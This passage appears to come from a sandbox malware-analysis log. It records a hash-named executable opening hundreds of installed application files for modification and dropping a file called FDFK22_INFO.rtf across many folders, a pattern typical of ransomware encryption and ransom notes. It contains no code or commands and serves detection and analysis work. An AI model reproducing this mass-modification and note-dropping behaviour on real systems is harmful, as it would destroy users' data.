Firefox\updater.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\es-419.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\default.jfc a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Stockholm a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\boot.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.runtime_0.10.0.v201209301036.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\README.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Darwin a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\New_York a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Winamac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\include\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij.bat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-6 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\de.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mauritius a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_win.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Palau a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Halifax a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hovd a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javaws.policy a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dhaka a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Maputo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Rangoon a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\pt-BR.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+2 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-14 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiBold.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+5 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+10 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Vancouver a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\New_Salem a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_it.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\plugin.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Urumqi a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Davis a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.descriptorProvider.exsd a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+8 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmiregistry.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\tr.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Urumqi a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Volgograd a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Colombo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Cocos a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Madrid a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Beirut a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Makassar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services_1.1.0.v20140328-1925.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\idlj.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Barbados a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Lagos a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Casey a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ir.idl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\meta-index a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Hermosillo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ashgabat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\MSBuild\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Almaty a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Resolute a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunmscapi.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Apia a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Darwin a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.css.sac_1.3.1.v200903091627.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Eula.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Catamarca a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\splash.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rio_Branco a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\xjc.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2launcher.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7MDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\local_policy.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\security\US_export_policy.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Minsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ho_Chi_Minh a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.dtd 